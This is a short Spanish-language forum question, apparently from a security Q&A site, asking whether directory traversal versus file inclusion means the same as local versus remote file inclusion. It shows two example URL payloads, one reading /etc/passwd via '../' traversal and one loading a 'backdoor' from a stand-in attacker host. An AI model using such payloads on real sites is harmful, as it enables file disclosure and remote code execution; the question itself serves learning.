Según esta esta pregunta anterior , parece que la diferencia entre el recorrido del directorio y la inclusión de archivos es la siguiente:
Recorrido del directorio
- La validación incorrecta de la entrada del usuario conduce a acceso de lectura del recurso del servidor .
- Ejemplo:
http://www.example.com?file=../../etc/passwd
Inclusión de archivos
- La validación incorrecta de la entrada del usuario conduce a la carga de un recurso externo en el servidor y la ejecución en él .
- Ejemplo:
http://www.example.com/vuln_page.php?file=http://www.hacker.com/backdoor
Este enlace , sin embargo, describe estos conceptos usando las palabras inclusión de archivos locales e inclusión de archivos remotos .
Entonces, es el primer ejemplo
- recorrido del directorio vs. inclusión de archivos
lo mismo que el segundo ejemplo
- inclusión de archivos locales vs. inclusión de archivos remotos
es decir, LFI / RFI es solo una terminología diferente para lo mismo?